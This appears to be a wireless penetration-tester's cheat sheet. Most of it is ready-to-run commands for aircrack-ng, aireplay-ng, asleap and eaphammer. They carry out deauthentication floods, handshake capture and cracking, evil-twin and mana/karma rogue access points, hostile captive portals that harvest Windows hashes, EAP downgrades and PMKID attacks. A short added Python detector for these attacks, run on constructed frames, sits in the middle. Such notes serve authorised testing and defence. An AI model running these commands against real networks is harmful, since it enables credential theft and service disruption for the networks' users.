Wireless Testing Methodology

special driver setup

wlan

  • captive portals

    • check if you see other MAC addresses and if they work
    • check if there is client separation (prior to authentication)
  • what are you expected to do?

    • assessment of a wireless network?
    • WPA2 PSK
    • WPA2 Enterprise
  • what to do

    • evaluate strength of PSK
    • review nearby networks
    • assessing guest network
    • checking network access
  • wpa2-psk exploit

$ airmon-ng check kill
$ airmon-ng start wlan0
$ iwconfig # -> check if there is a monitor mode
$ airodump-ng wlan0mon # check for networks
$ airodump-ng -c 6 --bssid bssid -w capture wlan0mon
 
# add deauth-attack to gather more handshakes
$ aireplay-ng -0 1 -a <access point bssid> -c <client mac> wlan0mon
 
#crack those hashes
$ aircrack-ng -w <wordlist> -b <ap mac address> <capture-file>

introduction posts to read:

EAPHammer Posts

notes

  • rogue AP to install implants
  • evil twin to attack wpa/2 eap/psk networks

# to attack psk network and get credentials
$ eaphammer -i wlan0 -e exampleCorp -c 1 --creds --auth wpa-psk
 
# to get credentials
$ eaphammer -i wlan0 -e exampleCorp --pmf enable --cloaking full --mana --auth wpa-eap --creds --mac-whitelist devices.txt --ssid-whitelist target.txt
$ for i in $(cat devices.txt); do aireplay-ng -0 5 -a xx -c $i wlan1; done  # wlan1 assumed to be the monitor-mode interface

initial attacks

# create a fake captive portal
$ eaphammer -i wlan0 --essid exampleCorp --captive-portal
 
# deauth clients
$ nmcli device set wlan0 managed off
$ ifconfig wlan1 down
$ iwconfig wlan1 mode monitor
$ ifconfig wlan1 up
$ iwconfig wlan1 channel 1
$ aireplay-ng -0 0 -a xx -c xx wlan1

attacking active probing

Also known as Karma/Mana style attacks. Karma-style attacks are not supported by eaphammer anymore.

In short, the rogue AP answers any incoming probe or connection request, whatever ESSID the client asks for.

# simple attack against macs in macstoattack.txt
$ eaphammer -i wlan0 -e seemslegit --cloaking full --captive-portal --mana --mac-whitelist macstoattack.txt
 
# loud mode attack (assumes that PNL of nearby device intersects)
# add the `--loud` flag to respond with all essids
 
# known beacon: uses a wordlist for known essids
$ eaphammer -i wlan0 --mana -e apples --known-beacons --captive-portal --known-ssids oranges
# or: --known-ssids-file words.txt
 
# known beacon burst attacks will directly attack a single client
# 1. start eaphammer with --mana
# 2. forge beacons to a client
$ forge-beacons -i wlan1 --bssid xx --known-essids-file known_ssids.txt --dst-addr xxx --burst-count 5

use management frame ACLs for more targeted attacks

--mac-whitelist, --mac-blacklist, --ssid-whitelist, --ssid-blacklist
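The behaviours above (evil twin on a known ESSID, a single BSSID answering for many ESSIDs in mana/loud/known-beacon mode, deauth bursts) are also what a wireless IDS looks for. The following is an added detection example written for this page, not part of the original notes or of eaphammer; it runs over a constructed list of already-decoded management frames, and the BSSIDs, ESSIDs and thresholds are assumptions.

```python
from collections import defaultdict

# Constructed sample of decoded 802.11 management frames (not a real capture):
# (timestamp_s, subtype, source_bssid, destination, essid or None)
SAMPLE_FRAMES = [
    (0.00, "beacon", "aa:bb:cc:dd:ee:01", "ff:ff:ff:ff:ff:ff", "exampleCorp"),  # legitimate AP
    (0.10, "probe_resp", "de:ad:be:ef:00:01", "11:22:33:44:55:66", "exampleCorp"),  # rogue, same ESSID
]
# The rogue BSSID answers probes for many unrelated ESSIDs (mana/loud/known-beacon behaviour).
for n, essid in enumerate(["apples", "oranges", "seemslegit", "home-wifi", "cafe", "airport"]):
    SAMPLE_FRAMES.append((0.20 + n * 0.01, "probe_resp", "de:ad:be:ef:00:01", "11:22:33:44:55:66", essid))
# ... and sends a burst of 12 deauth frames to one client within a quarter second.
for n in range(12):
    SAMPLE_FRAMES.append((1.00 + n * 0.02, "deauth", "de:ad:be:ef:00:01", "11:22:33:44:55:66", None))

# Inventory of BSSIDs that are allowed to announce each corporate ESSID (assumed values).
AUTHORIZED_BSSIDS = {"exampleCorp": {"aa:bb:cc:dd:ee:01"}}


def analyze(frames, authorized, essid_threshold=5, deauth_threshold=10, window=1.0):
    """Return sets of suspicious BSSIDs: evil twins, karma-style responders, deauth floods."""
    essids_by_bssid = defaultdict(set)   # which ESSIDs each BSSID has announced
    deauth_times = defaultdict(list)     # timestamps of deauth frames per source
    evil_twins = set()
    for ts, subtype, src, _dst, essid in frames:
        if subtype in ("beacon", "probe_resp") and essid:
            essids_by_bssid[src].add(essid)
            # An ESSID we own announced by a BSSID we do not own is an evil-twin candidate.
            if essid in authorized and src not in authorized[essid]:
                evil_twins.add((essid, src))
        elif subtype == "deauth":
            deauth_times[src].append(ts)
    # A single BSSID answering for many distinct ESSIDs is the signature of a mana/loud responder.
    karma_suspects = {b for b, s in essids_by_bssid.items() if len(s) >= essid_threshold}
    # Sliding window over sorted deauth timestamps: flag sources exceeding the rate threshold.
    deauth_floods = set()
    for src, times in deauth_times.items():
        times.sort()
        start = 0
        for end, ts in enumerate(times):
            while ts - times[start] > window:
                start += 1
            if end - start + 1 >= deauth_threshold:
                deauth_floods.add(src)
                break
    return {"evil_twins": evil_twins, "karma_suspects": karma_suspects, "deauth_floods": deauth_floods}

if __name__ == "__main__":
    for finding, bssids in analyze(SAMPLE_FRAMES, AUTHORIZED_BSSIDS).items():
        print(f"{finding}: {sorted(bssids) or 'none'}")
```

The legitimate AP announces one ESSID and sends no deauths, so only the rogue BSSID is reported in all three categories.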

attacking WPA3/OWE

  • opportunistic wireless encryption
  • authentication vs. encryption: treating the two as one package is why open (unencrypted) wireless networks still exist
  • OWE adds encryption (through DH) to open networks
  • OWE transition mode: 2 networks, 1 visible open network whose beacons carry a link to the OWE network in the broadcast parameters, and 1 hidden OWE network
  • OWE only helps against passive sniffing attacks, not against evil-twin attacks (as there is no authentication)

eap attacks

# create new self-signed certificate
$ eaphammer --cert-wizard
 
# start the capture
$ eaphammer --bssid xx --essid networkname --channel 2 --wpa 2 --auth wpa-eap --interface wlan0 --creds
 
# use the captured challenge/response to crack the RADIUS credentials offline
$ asleap -C challenge -R response -W wordlist
 
# perform downgrade attacks with `--eapdowngrade full` or `eap-downgrade gtc`
# use automatic cracking with `--autocrack`

hostile captive portal

# tries to get windows hashes
$ eaphammer --bssid xx --essid evilcrop --channel 6 --auth wpa-eap --hostile-portal

PMKID attack

$ eaphammer --pmkid --interface wlan0 --essid target

essid stripping

# try to force password re-entry
$ eaphammer -i wlan0 --auth wpa-eap --essid wifiAP --creds --negotiate balanced --essid-stripping '\r'

802.11n

--hw-mode n, together with --channel-width 20/40. Channel bonding is used automatically if channel width=40; the secondary channel can otherwise be configured through --ht40 plus/minus/auto

other tools

  • airgeddon
  • eaphammer